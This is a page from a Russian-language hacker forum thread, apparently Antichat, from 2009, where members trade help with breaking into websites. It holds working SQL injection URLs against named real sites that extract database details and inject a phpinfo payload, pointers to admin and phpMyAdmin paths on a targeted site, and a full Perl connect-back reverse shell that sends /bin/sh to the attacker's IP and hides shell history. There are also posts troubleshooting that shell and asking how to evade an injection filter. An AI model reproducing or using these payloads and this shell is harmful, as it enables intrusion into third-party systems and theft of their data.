Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 459 of 1207
  1. _iks_

    _iks_ Member

    Joined:
    21 Feb 2009
    Messages:
    60
    Likes Received:
    59
    Reputations:
    61
    http://www.stalkerfest.org/page.php?page=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

    О мне выдаёт следующее:
    Parse error: parse error, unexpected $ in /www/kinogild/www/htdocs/stalkerfest/page.php(44) : eval()'d code on line 1

    Как это понимать? Растолкуйте кто нибудь пожалуйста!
     
    #9161 _iks_, 8 Oct 2009
  2. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    Code:
    http://www.stalkerfest.org/page.php?page=-29+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14--
    вот как бы,если это в виду имел
     
    #9162 Shadrin, 8 Oct 2009
    1 person likes this.
  3. _iks_

    _iks_ Member

    Joined:
    21 Feb 2009
    Messages:
    60
    Likes Received:
    59
    Reputations:
    61
    Да, имел ввиду именно это. Спасибо. Я просто не сообразил что в желтом поле выводился номер принтабельного поля, думал ошибка какаято.

    Зачем знак комментария в конце? И без него то же самое отображает вроде
     
    #9163 _iks_, 8 Oct 2009
    Last edited: 8 Oct 2009
  4. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    http://www.stalkerfest.org/page.php?page=-29+union+select+1,2,3,0x706870696e666f28293b,5,6,7,8,9,10,11,12,13,14/*
     
    #9164 Spyder, 8 Oct 2009
    1 person likes this.
  5. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Не всегда :eek:
     
    #9165 DrAssault, 8 Oct 2009
  6. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    я привык,не всегда нормально отображается без него
     
    #9166 Shadrin, 8 Oct 2009
  7. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Не пойму почему не делается бек-коннект :( Делаю следующее...

    У себя в cmd прописал start nc -l -p 80

    Залил перловый бэкдор

    Code:
    #!/usr/bin/perl 
use IO::Socket; 
#IRAN HACKERS SABOTAGE Connect Back Shell 
#code by:LorD 
#We Are :LorD-C0d3r-NT 
# 
#lord@SlackwareLinux:/home/programing$ perl dc.pl 
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- 
# 
#Usage: dc.pl [Host] [Port] 
# 
#Ex: dc.pl 127.0.0.1 2121 
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121 
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- 
# 
#[*] Resolving HostName 
#[*] Connecting... 127.0.0.1 
#[*] Spawning Shell 
#[*] Connected to remote host 

#bash-2.05b# nc -vv -l -p 2121 
#listening on [any] 2121 ... 
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121 
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- 
# 
#--==Systeminfo==-- 
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux 
# 
#--==Userinfo==-- 
#uid=1001(lord) gid=100(users) groups=100(users) 
# 
#--==Directory==-- 
#/root 
# 
#--==Shell==-- 
# 
$system = '/bin/sh'; 
$ARGC=@ARGV; 
print "--== Backdoor -=====- Hello Melkiy ==-- \n\n"; 
if ($ARGC!=2) { 
print "Usage: $0 [Host] [Port] \n\n"; 
die "Ex: $0 127.0.0.1 2121 \n"; 
} 
use Socket; 
use FileHandle; 
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 
print "[*] Resolving HostName\n"; 
print "[*] Connecting... $ARGV[0] \n"; 
print "[*] Spawning Shell \n"; 
print "[*] Connected to remote host \n"; 
SOCKET->autoflush(); 
open(STDIN, ">&SOCKET"); 
open(STDOUT,">&SOCKET"); 
open(STDERR,">&SOCKET"); 
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n"; 
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo; 
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); 
system($system); 
#EOF
    С шелла пишу perl sd.pl 123.123.123.123[свой IP] 80

    И выдаёт:

    --== Backdoor -=====- Hello Melkiy ==--

    [-] Unable to Connect Host


    В чём проблема? :(

    P.S Пробовал другие порты, тоже самое...
     
    #9167 .:[melkiy]:., 8 Oct 2009
  8. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Пинг с шелла идет на ваш IP?
     
    #9168 krypt3r, 8 Oct 2009
  9. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163

    Code:
    C:\Documents and Settings\Администратор>ping ****.ru

Обмен пакетами с ****.ru [**.**.**.53] по 32 байт:

Ответ от **.**.**.**: Заданная сеть недоступна.
Превышен интервал ожидания для запроса.
Ответ от **.**.**.**: Заданная сеть недоступна.
Превышен интервал ожидания для запроса.

Статистика Ping для **.**.**.**:
    Пакетов: отправлено = 4, получено = 2, потеряно = 2 (50% потерь),
Приблизительное время приема-передачи в мс:
    Минимальное = 0мсек, Максимальное = 0 мсек, Среднее = 0 мсек
    :(
     
    #9169 .:[melkiy]:., 8 Oct 2009
  10. Vydi

    Vydi Banned

    Joined:
    30 Sep 2009
    Messages:
    8
    Likes Received:
    3
    Reputations:
    0
    Превышен интервал ожидания для запроса.
    Ответ от **.**.**.**: Заданная сеть недоступна.

    Подожди может
     
    #9170 Vydi, 8 Oct 2009
  11. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    еще вопрос... когда выполняю комманду perl perl.pl [свой IP] 80 сервер тухнет! в чем проблема?

    [500] Internal Server Error

    и так на каждом шелле:( не хочет делать бэк-коннект на мой комп, хотя нет, попробовал с деда - тоже самое

    --

    Это пиздец какой-то =( ни один сервер не может подключится...

    Code:
    --== Backdoor -=====- Hello Melkiy ==--

[-] Unable to Connect Host
    в чём проблема-то?:(


    //Разобрался
     
    #9171 .:[melkiy]:., 8 Oct 2009
    Last edited: 8 Oct 2009
  12. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    860
    Likes Received:
    616
    Reputations:
    211
    .:[melkiy]:.: может у тебя не выделенный ip адрес?
     
    #9172 eLWAux, 8 Oct 2009
    1 person likes this.
  13. Torentte

    Torentte New Member

    Joined:
    3 Oct 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Подскажите где сдесь админка?
    _http://infosfera.sfo.ru/a/index.php
     
    #9173 Torentte, 8 Oct 2009
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://infosfera.sfo.ru/a/forum/admin/
     
    #9174 mailbrush, 8 Oct 2009
  15. Torentte

    Torentte New Member

    Joined:
    3 Oct 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Вроде не совсем то....
     
    #9175 Torentte, 8 Oct 2009
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://infosfera.sfo.ru/phpmyadmin/
    не админка, но может оказаться и полезней:)

    PS: Админку что-то своими средствами не нашел, правда искал минут 5. Бежать надо.
     
    #9176 Pashkela, 8 Oct 2009
  17. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Почему же? Я уже и бекконнект сделал :)
     
    #9177 mailbrush, 8 Oct 2009
  18. Torentte

    Torentte New Member

    Joined:
    3 Oct 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    странно,у меня есть и логин и пасс, но чёт не пускает)
     
    #9178 Torentte, 8 Oct 2009
  19. Torentte

    Torentte New Member

    Joined:
    3 Oct 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    всё работает)спс биг)эт я напутал)))
     
    #9179 Torentte, 8 Oct 2009
    1 person likes this.
  20. smtgr

    smtgr New Member

    Joined:
    8 Oct 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Доброго времени.
    Нашел вроде SQL-inj:
    http://site.net/index.php?id=777' - выдает пустую страницу
    http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
    http://site.net/index.php?id=777+order+by+10/*-снова пусто
    Подобрал, 3 столбца. Набираю:
    http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
    Похоже на фильтрацию. Какие варианты есть чтобы обойти?

    P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
     
    #9180 smtgr, 8 Oct 2009
    Last edited: 8 Oct 2009
(You must log in or sign up to post here.)
Page 459 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.